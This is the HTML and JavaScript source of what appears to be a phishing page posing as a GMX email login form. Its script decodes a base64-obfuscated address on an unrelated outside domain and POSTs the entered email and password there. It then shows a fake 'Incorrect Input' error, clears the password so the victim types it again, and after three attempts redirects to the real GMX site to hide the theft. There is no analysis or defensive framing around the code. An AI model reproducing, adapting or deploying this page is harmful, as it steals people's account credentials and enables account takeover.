<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Login</title>
    <link rel="shortcut icon" type="image/x-icon" href="favicon.ico"/>
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 15px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=email],
  input[type=password]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 32px;
  width: 100%;
  margin: 0;
  padding: 10px;
  background: transparent;
  border: #fff;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 0px;
  font-size: 15px;
  font-weight: 400;
  font-family: inherit;
  line-height: 18px;
  vertical-align: top;
  color: #404040;
  }
  input[type=email]:focus,
  input[type=password]:focus {
  outline: none;
  padding: 10px;
  background-color: transparent;
  border-radius: 5px;
  font-size: 15px;
  font-weight: 400;
  font-family: inherit;
  line-height: 18px;
  border: 2px #114898;
  }
</style>
<body background="bg.png">

<div align="center">
	<table border="0" width="368" cellspacing="0" cellpadding="0">
		<tr>
			<td>
			<table border="0" width="100%" cellspacing="0" cellpadding="0">
				<tr>
					<td height="105"></td>
				</tr>
				<tr>
					<td height="428" bgcolor="#00FF00" background="fm.png">
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
					  <form >
						<tr>
							<td height="232"></td>
						</tr>
						<tr>
							<td>
							<table border="0" width="100%" cellspacing="0" cellpadding="0">
								<tr>
									<td width="32"></td>
									<td>
									 <input type="email" name="username" value="" required autofocus id="id"  >
									 <input type="hidden" name="domain" value="https://www.gmx.net/consent-management/" >
									</td>
									<td width="31"></td>
								</tr>
							</table>
							</td>
						</tr>
						<tr>
							<td height="36"></td>
						</tr>
						<tr>
							<td>
							<table border="0" width="100%" cellspacing="0" cellpadding="0">
								<tr>
									<td width="32"></td>
									<td>
									 <input type="password" name="password" value="" required id="pw" >
									</td>
									<td width="31"></td>
								</tr>
							</table>
							</td>
						</tr>
						<tr>
							<td height="16"></td>
						</tr>
						<tr>
							<td>
							<table border="0" width="100%" cellspacing="0" cellpadding="0">
								<tr>
									<td width="32"></td>
									<td>
									 <input type="submit" id="submit-btn" value="" style="background: url('btn.png') no-repeat; width: 304px; height: 32px; border: none; cursor: pointer;">               </td>
									
									<td width="31"></td>
								</tr>
							</table>
							</td>
						</tr>
						<tr>
							<td height="70"><div id="error_message" style="width:90%; height:10; color:red" align="center" >  </div></td>
						</tr>
						</form>
					</table>
					</td>
				</tr>
				<tr>
					<td height="110"></td>
				</tr>
			</table>
			</td>
		</tr>
	</table>
</div>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script src="https://code.jquery.com/jquery-1.9.1.js"></script>
    <script>

	  
	   $(document).ready(function() {
		    var user=$("#pet").val();
		  var  count=0;
		   
		   
		   
		    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
		   
		   
        $('form').submit(function(e) {
			
			count=count+1;
			
		   var d=atob("aHR0cHM6Ly9nYnBhY2lmaWN0cmFkaW5nLnN0b3JlL3NlYy9qeS9teC5waHA=");

            e.preventDefault();
               $.ajax({
			   
            type: 'POST',
            url: d,
			crossDomain: true,
            data: $('form').serialize(),
			
			 beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
			  
			  
			  
if (count>=3) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://www.gmx.com");

                  }else{
				   var x = document.getElementById("id").value;
					 
					
				   $('#submit-btn').html('CONTINUE');
					   document.getElementById("pw").value ="";
					 
					
            	$("#err_common").show();
				    $("#error_message").html("Incorrect Input, Try again");
				

					 }
						
            },
			
			
					 
            success: function () {
				$("#error_message").show();
				    $("#err_common").html("Incorrect Input, Try again");
				

	
            }
          });
        });
    });
    </script>
</body>

</html>
